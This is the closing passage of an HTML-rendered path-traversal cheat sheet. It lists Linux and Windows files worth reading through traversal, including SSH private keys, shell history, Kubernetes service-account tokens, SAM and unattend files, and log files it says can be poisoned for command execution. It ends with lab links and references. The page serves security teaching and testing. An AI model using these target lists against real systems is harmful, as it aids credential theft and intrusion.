<a id="__codelineno-10-10" name="__codelineno-10-10" href="#__codelineno-10-10"></a><span class="p">/</span><span class="n">proc</span><span class="p">/</span><span class="n">version</span>
<a id="__codelineno-10-11" name="__codelineno-10-11" href="#__codelineno-10-11"></a><span class="p">/</span><span class="n">proc</span><span class="p">/</span><span class="n">cmdline</span>
<a id="__codelineno-10-12" name="__codelineno-10-12" href="#__codelineno-10-12"></a><span class="p">/</span><span class="n">proc</span><span class="p">/</span><span class="n">sched_debug</span>
<a id="__codelineno-10-13" name="__codelineno-10-13" href="#__codelineno-10-13"></a><span class="p">/</span><span class="n">proc</span><span class="p">/</span><span class="n">mounts</span>
<a id="__codelineno-10-14" name="__codelineno-10-14" href="#__codelineno-10-14"></a><span class="p">/</span><span class="n">proc</span><span class="p">/</span><span class="n">net</span><span class="p">/</span><span class="n">arp</span>
<a id="__codelineno-10-15" name="__codelineno-10-15" href="#__codelineno-10-15"></a><span class="p">/</span><span class="n">proc</span><span class="p">/</span><span class="n">net</span><span class="p">/</span><span class="n">route</span>
<a id="__codelineno-10-16" name="__codelineno-10-16" href="#__codelineno-10-16"></a><span class="p">/</span><span class="n">proc</span><span class="p">/</span><span class="n">net</span><span class="p">/</span><span class="n">tcp</span>
<a id="__codelineno-10-17" name="__codelineno-10-17" href="#__codelineno-10-17"></a><span class="p">/</span><span class="n">proc</span><span class="p">/</span><span class="n">net</span><span class="p">/</span><span class="n">udp</span>
<a id="__codelineno-10-18" name="__codelineno-10-18" href="#__codelineno-10-18"></a><span class="p">/</span><span class="n">proc</span><span class="p">/</span><span class="n">self</span><span class="p">/</span><span class="n">cwd</span><span class="p">/</span><span class="n">index</span><span class="p">.</span><span class="n">php</span>
<a id="__codelineno-10-19" name="__codelineno-10-19" href="#__codelineno-10-19"></a><span class="p">/</span><span class="n">proc</span><span class="p">/</span><span class="n">self</span><span class="p">/</span><span class="n">cwd</span><span class="p">/</span><span class="n">main</span><span class="p">.</span><span class="n">py</span>
<a id="__codelineno-10-20" name="__codelineno-10-20" href="#__codelineno-10-20"></a><span class="p">/</span><span class="n">home</span><span class="p">/</span><span class="nv">$USER</span><span class="p">/.</span><span class="n">bash_history</span>
<a id="__codelineno-10-21" name="__codelineno-10-21" href="#__codelineno-10-21"></a><span class="p">/</span><span class="n">home</span><span class="p">/</span><span class="nv">$USER</span><span class="p">/.</span><span class="n">ssh</span><span class="p">/</span><span class="n">id_rsa</span>
<a id="__codelineno-10-22" name="__codelineno-10-22" href="#__codelineno-10-22"></a><span class="p">/</span><span class="n">run</span><span class="p">/</span><span class="n">secrets</span><span class="p">/</span><span class="n">kubernetes</span><span class="p">.</span><span class="n">io</span><span class="p">/</span><span class="n">serviceaccount</span><span class="p">/</span><span class="n">token</span>
<a id="__codelineno-10-23" name="__codelineno-10-23" href="#__codelineno-10-23"></a><span class="p">/</span><span class="n">run</span><span class="p">/</span><span class="n">secrets</span><span class="p">/</span><span class="n">kubernetes</span><span class="p">.</span><span class="n">io</span><span class="p">/</span><span class="n">serviceaccount</span><span class="p">/</span><span class="n">namespace</span>
<a id="__codelineno-10-24" name="__codelineno-10-24" href="#__codelineno-10-24"></a><span class="p">/</span><span class="n">run</span><span class="p">/</span><span class="n">secrets</span><span class="p">/</span><span class="n">kubernetes</span><span class="p">.</span><span class="n">io</span><span class="p">/</span><span class="n">serviceaccount</span><span class="p">/</span><span class="n">certificate</span>
<a id="__codelineno-10-25" name="__codelineno-10-25" href="#__codelineno-10-25"></a><span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">run</span><span class="p">/</span><span class="n">secrets</span><span class="p">/</span><span class="n">kubernetes</span><span class="p">.</span><span class="n">io</span><span class="p">/</span><span class="n">serviceaccount</span>
<a id="__codelineno-10-26" name="__codelineno-10-26" href="#__codelineno-10-26"></a><span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">lib</span><span class="p">/</span><span class="n">mlocate</span><span class="p">/</span><span class="n">mlocate</span><span class="p">.</span><span class="n">db</span>
<a id="__codelineno-10-27" name="__codelineno-10-27" href="#__codelineno-10-27"></a><span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">lib</span><span class="p">/</span><span class="n">plocate</span><span class="p">/</span><span class="n">plocate</span><span class="p">.</span><span class="n">db</span>
<a id="__codelineno-10-28" name="__codelineno-10-28" href="#__codelineno-10-28"></a><span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">lib</span><span class="p">/</span><span class="n">mlocate</span><span class="p">.</span><span class="n">db</span>
</code></pre></div>
<h3 id="interesting-windows-files">Interesting Windows files</h3>
<p>Always existing file in recent Windows machine.
Ideal to test path traversal but nothing much interesting inside...</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a><span class="n">c</span><span class="p">:\</span><span class="n">windows</span><span class="p">\</span><span class="n">system32</span><span class="p">\</span><span class="n">license</span><span class="p">.</span><span class="n">rtf</span>
<a id="__codelineno-11-2" name="__codelineno-11-2" href="#__codelineno-11-2"></a><span class="n">c</span><span class="p">:\</span><span class="n">windows</span><span class="p">\</span><span class="n">system32</span><span class="p">\</span><span class="n">eula</span><span class="p">.</span><span class="n">txt</span>
</code></pre></div>
<p>Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="n">c</span><span class="p">:/</span><span class="n">boot</span><span class="p">.</span><span class="n">ini</span>
<a id="__codelineno-12-2" name="__codelineno-12-2" href="#__codelineno-12-2"></a><span class="n">c</span><span class="p">:/</span><span class="n">inetpub</span><span class="p">/</span><span class="n">logs</span><span class="p">/</span><span class="n">logfiles</span>
<a id="__codelineno-12-3" name="__codelineno-12-3" href="#__codelineno-12-3"></a><span class="n">c</span><span class="p">:/</span><span class="n">inetpub</span><span class="p">/</span><span class="n">wwwroot</span><span class="p">/</span><span class="n">global</span><span class="p">.</span><span class="n">asa</span>
<a id="__codelineno-12-4" name="__codelineno-12-4" href="#__codelineno-12-4"></a><span class="n">c</span><span class="p">:/</span><span class="n">inetpub</span><span class="p">/</span><span class="n">wwwroot</span><span class="p">/</span><span class="n">index</span><span class="p">.</span><span class="n">asp</span>
<a id="__codelineno-12-5" name="__codelineno-12-5" href="#__codelineno-12-5"></a><span class="n">c</span><span class="p">:/</span><span class="n">inetpub</span><span class="p">/</span><span class="n">wwwroot</span><span class="p">/</span><span class="n">web</span><span class="p">.</span><span class="n">config</span>
<a id="__codelineno-12-6" name="__codelineno-12-6" href="#__codelineno-12-6"></a><span class="n">c</span><span class="p">:/</span><span class="n">sysprep</span><span class="p">.</span><span class="n">inf</span>
<a id="__codelineno-12-7" name="__codelineno-12-7" href="#__codelineno-12-7"></a><span class="n">c</span><span class="p">:/</span><span class="n">sysprep</span><span class="p">.</span><span class="n">xml</span>
<a id="__codelineno-12-8" name="__codelineno-12-8" href="#__codelineno-12-8"></a><span class="n">c</span><span class="p">:/</span><span class="n">sysprep</span><span class="p">/</span><span class="n">sysprep</span><span class="p">.</span><span class="n">inf</span>
<a id="__codelineno-12-9" name="__codelineno-12-9" href="#__codelineno-12-9"></a><span class="n">c</span><span class="p">:/</span><span class="n">sysprep</span><span class="p">/</span><span class="n">sysprep</span><span class="p">.</span><span class="n">xml</span>
<a id="__codelineno-12-10" name="__codelineno-12-10" href="#__codelineno-12-10"></a><span class="n">c</span><span class="p">:/</span><span class="n">system32</span><span class="p">/</span><span class="n">inetsrv</span><span class="p">/</span><span class="n">metabase</span><span class="p">.</span><span class="n">xml</span>
<a id="__codelineno-12-11" name="__codelineno-12-11" href="#__codelineno-12-11"></a><span class="n">c</span><span class="p">:/</span><span class="n">sysprep</span><span class="p">.</span><span class="n">inf</span>
<a id="__codelineno-12-12" name="__codelineno-12-12" href="#__codelineno-12-12"></a><span class="n">c</span><span class="p">:/</span><span class="n">sysprep</span><span class="p">.</span><span class="n">xml</span>
<a id="__codelineno-12-13" name="__codelineno-12-13" href="#__codelineno-12-13"></a><span class="n">c</span><span class="p">:/</span><span class="n">sysprep</span><span class="p">/</span><span class="n">sysprep</span><span class="p">.</span><span class="n">inf</span>
<a id="__codelineno-12-14" name="__codelineno-12-14" href="#__codelineno-12-14"></a><span class="n">c</span><span class="p">:/</span><span class="n">sysprep</span><span class="p">/</span><span class="n">sysprep</span><span class="p">.</span><span class="n">xml</span>
<a id="__codelineno-12-15" name="__codelineno-12-15" href="#__codelineno-12-15"></a><span class="n">c</span><span class="p">:/</span><span class="n">system</span> <span class="n">volume</span> <span class="n">information</span><span class="p">/</span><span class="n">wpsettings</span><span class="p">.</span><span class="n">dat</span>
<a id="__codelineno-12-16" name="__codelineno-12-16" href="#__codelineno-12-16"></a><span class="n">c</span><span class="p">:/</span><span class="n">system32</span><span class="p">/</span><span class="n">inetsrv</span><span class="p">/</span><span class="n">metabase</span><span class="p">.</span><span class="n">xml</span>
<a id="__codelineno-12-17" name="__codelineno-12-17" href="#__codelineno-12-17"></a><span class="n">c</span><span class="p">:/</span><span class="n">unattend</span><span class="p">.</span><span class="n">txt</span>
<a id="__codelineno-12-18" name="__codelineno-12-18" href="#__codelineno-12-18"></a><span class="n">c</span><span class="p">:/</span><span class="n">unattend</span><span class="p">.</span><span class="n">xml</span>
<a id="__codelineno-12-19" name="__codelineno-12-19" href="#__codelineno-12-19"></a><span class="n">c</span><span class="p">:/</span><span class="n">unattended</span><span class="p">.</span><span class="n">txt</span>
<a id="__codelineno-12-20" name="__codelineno-12-20" href="#__codelineno-12-20"></a><span class="n">c</span><span class="p">:/</span><span class="n">unattended</span><span class="p">.</span><span class="n">xml</span>
<a id="__codelineno-12-21" name="__codelineno-12-21" href="#__codelineno-12-21"></a><span class="n">c</span><span class="p">:/</span><span class="n">windows</span><span class="p">/</span><span class="n">repair</span><span class="p">/</span><span class="n">sam</span>
<a id="__codelineno-12-22" name="__codelineno-12-22" href="#__codelineno-12-22"></a><span class="n">c</span><span class="p">:/</span><span class="n">windows</span><span class="p">/</span><span class="n">repair</span><span class="p">/</span><span class="n">system</span>
</code></pre></div>
<p>The following log files are controllable and can be included with an evil payload to achieve a command execution</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">log</span><span class="p">/</span><span class="n">apache</span><span class="p">/</span><span class="n">access</span><span class="p">.</span><span class="n">log</span>
<a id="__codelineno-13-2" name="__codelineno-13-2" href="#__codelineno-13-2"></a><span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">log</span><span class="p">/</span><span class="n">apache</span><span class="p">/</span><span class="n">error</span><span class="p">.</span><span class="n">log</span>
<a id="__codelineno-13-3" name="__codelineno-13-3" href="#__codelineno-13-3"></a><span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">log</span><span class="p">/</span><span class="n">httpd</span><span class="p">/</span><span class="n">error_log</span>
<a id="__codelineno-13-4" name="__codelineno-13-4" href="#__codelineno-13-4"></a><span class="p">/</span><span class="n">usr</span><span class="p">/</span><span class="n">local</span><span class="p">/</span><span class="n">apache</span><span class="p">/</span><span class="n">log</span><span class="p">/</span><span class="n">error_log</span>
<a id="__codelineno-13-5" name="__codelineno-13-5" href="#__codelineno-13-5"></a><span class="p">/</span><span class="n">usr</span><span class="p">/</span><span class="n">local</span><span class="p">/</span><span class="n">apache2</span><span class="p">/</span><span class="n">log</span><span class="p">/</span><span class="n">error_log</span>
<a id="__codelineno-13-6" name="__codelineno-13-6" href="#__codelineno-13-6"></a><span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">log</span><span class="p">/</span><span class="n">nginx</span><span class="p">/</span><span class="n">access</span><span class="p">.</span><span class="n">log</span>
<a id="__codelineno-13-7" name="__codelineno-13-7" href="#__codelineno-13-7"></a><span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">log</span><span class="p">/</span><span class="n">nginx</span><span class="p">/</span><span class="n">error</span><span class="p">.</span><span class="n">log</span>
<a id="__codelineno-13-8" name="__codelineno-13-8" href="#__codelineno-13-8"></a><span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">log</span><span class="p">/</span><span class="n">vsftpd</span><span class="p">.</span><span class="n">log</span>
<a id="__codelineno-13-9" name="__codelineno-13-9" href="#__codelineno-13-9"></a><span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">log</span><span class="p">/</span><span class="n">sshd</span><span class="p">.</span><span class="n">log</span>
<a id="__codelineno-13-10" name="__codelineno-13-10" href="#__codelineno-13-10"></a><span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">log</span><span class="p">/</span><span class="n">mail</span>
</code></pre></div>
<h2 id="labs">Labs</h2>
<ul>
<li><a href="https://portswigger.net/web-security/file-path-traversal/lab-simple">File path traversal, simple case</a></li>
<li><a href="https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass">File path traversal, traversal sequences blocked with absolute path bypass</a></li>
<li><a href="https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively">File path traversal, traversal sequences stripped non-recursively</a></li>
<li><a href="https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode">File path traversal, traversal sequences stripped with superfluous URL-decode</a></li>
<li><a href="https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path">File path traversal, validation of start of path</a></li>
<li><a href="https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass">File path traversal, validation of file extension with null byte bypass</a></li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/">Path Traversal Cheat Sheet: Windows</a></li>
<li><a href="https://en.wikipedia.org/wiki/Directory_traversal_attack">Directory traversal attack - Wikipedia</a></li>
<li><a href="https://cwe.mitre.org/data/definitions/40.html">CWE-40: Path Traversal: '\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018</a></li>
<li><a href="https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&amp;sk=e9ddbadd61576f941be97e111e953381">NGINX may be protecting your applications from traversal attacks without you even knowing</a></li>
<li><a href="https://portswigger.net/web-security/file-path-traversal">Directory traversal - Portswigger</a></li>
<li><a href="https://twitter.com/irsdl/status/1640390106312835072">Cookieless ASPNET - Soroush Dalili</a></li>
<li><a href="https://youtu.be/YlZGJ28By8U">EP 057 | Proc filesystem tricks &amp; locatedb abuse with @<em>remsio</em> &amp; @_bluesheet - TheLaluka - 30 nov. 2023</a></li>
</ul>
<aside class="md-source-file">
<span class="md-source-file__fact">
<span class="md-icon" title="Last update">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1-2.1-2M12.5 7v5.2l4 2.4-1 1L11 13V7h1.5M11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2v1.8Z"/></svg>
</span>
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">December 1, 2023</span>
</span>
</aside>
</article>
</div>
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
</div>
<button type="button" class="md-top md-icon" data-md-component="top" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8v12Z"/></svg>
Back to top
</button>
</main>
<footer class="md-footer">
<div class="md-footer-meta md-typeset">
<div class="md-footer-meta__inner md-grid">
<div class="md-copyright">
Made with
<a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
Material for MkDocs
</a>
</div>
</div>
</div>
</footer>
</div>
<div class="md-dialog" data-md-component="dialog">
<div class="md-dialog__inner md-typeset"></div>
</div>
<script id="__config" type="application/json">{"base": "..", "features": ["content.code.copy", "navigation.tracking", "navigation.top"], "search": "../assets/javascripts/workers/search.b8dbb3d2.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
<script src="../assets/javascripts/bundle.1e8ae164.min.js"></script>
</body>
</html>
View Git Blame Copy Permalink